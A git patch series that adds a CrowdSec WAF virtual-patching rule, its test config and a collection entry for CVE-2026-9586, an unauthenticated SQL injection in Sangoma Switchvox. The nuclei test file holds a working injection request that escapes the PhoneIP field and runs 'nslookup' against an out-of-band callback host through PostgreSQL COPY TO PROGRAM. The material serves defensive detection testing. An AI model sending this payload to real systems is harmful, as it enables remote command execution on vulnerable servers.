From 12d9a10b55114707d9919db84c01ddc3b6c9de4a Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Thu, 17 Sep 2026 11:12:13 +0200 Subject: [PATCH 1/4] Add vpatch-CVE-2026-9586 rule --- .../crowdsecurity/vpatch-CVE-2026-9586.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2026-9586.yaml diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2026-9586.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2026-9586.yaml new file mode 100644 index 00000000000..c5e4d063467 --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2026-9586.yaml @@ -0,0 +1,35 @@ +## autogenerated on 2026-09-17 09:12:10 +name: crowdsecurity/vpatch-CVE-2026-9586 +description: 'Detects unauthenticated SQL injection in Sangoma Switchvox through the PhoneIP XML field.' +rules: + - and: + - zones: + - URI + transform: + - urldecode + - lowercase + match: + type: contains + value: '/pa' + - zones: + - BODY_ARGS + variables: + - PhoneIP + transform: + - urldecode + - lowercase + match: + type: contains + value: "'" + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'Sangoma Switchvox - SQLI' + classification: + - cve.CVE-2026-9586 + - attack.T1059 + - cwe.CWE-89 From b9b98f60befd1c763ce2bc152a29ebac850b5877 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Thu, 17 Sep 2026 11:12:15 +0200 Subject: [PATCH 2/4] Add vpatch-CVE-2026-9586 test config --- .appsec-tests/vpatch-CVE-2026-9586/config.yaml | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2026-9586/config.yaml diff --git a/.appsec-tests/vpatch-CVE-2026-9586/config.yaml b/.appsec-tests/vpatch-CVE-2026-9586/config.yaml new file mode 100644 index 00000000000..913eae8f84a --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2026-9586/config.yaml @@ -0,0 +1,5 @@ +## autogenerated on 2026-09-17 09:12:10 +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2026-9586.yaml +nuclei_template: CVE-2026-9586.yaml From 49d13675999f4d08317b21b8d7837d7017188b8b Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Thu, 17 Sep 2026 11:12:17 +0200 Subject: [PATCH 3/4] Add CVE-2026-9586.yaml test --- .../vpatch-CVE-2026-9586/CVE-2026-9586.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2026-9586/CVE-2026-9586.yaml diff --git a/.appsec-tests/vpatch-CVE-2026-9586/CVE-2026-9586.yaml b/.appsec-tests/vpatch-CVE-2026-9586/CVE-2026-9586.yaml new file mode 100644 index 00000000000..b63113a70af --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2026-9586/CVE-2026-9586.yaml @@ -0,0 +1,21 @@ +## autogenerated on 2026-09-17 09:12:10 +id: CVE-2026-9586 +info: + name: CVE-2026-9586 + author: crowdsec + severity: info + description: CVE-2026-9586 testing + tags: appsec-testing +http: + - raw: + - | + POST /pa HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + 10.0.0.1'; COPY (SELECT '') TO PROGRAM 'nslookup {{interactsh-url}}'--tel_notify + cookie-reuse: true + matchers: + - type: status + status: + - 403 From bd65952c21c837923d660298282f4bd86e08e46d Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Thu, 17 Sep 2026 11:12:19 +0200 Subject: [PATCH 4/4] Add vpatch-CVE-2026-9586 rule to vpatch collection --- collections/crowdsecurity/appsec-virtual-patching.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml index 94d0ed3d1ea..6527149dd47 100644 --- a/collections/crowdsecurity/appsec-virtual-patching.yaml +++ b/collections/crowdsecurity/appsec-virtual-patching.yaml @@ -130,6 +130,7 @@ appsec-rules: - crowdsecurity/vpatch-CVE-2024-51977 - crowdsecurity/vpatch-CVE-2022-31499 - crowdsecurity/vpatch-CVE-2025-57819 +- crowdsecurity/vpatch-CVE-2026-9586 - crowdsecurity/vpatch-CVE-2018-1207 - crowdsecurity/vpatch-CVE-2025-59528 - crowdsecurity/vpatch-CVE-2024-46506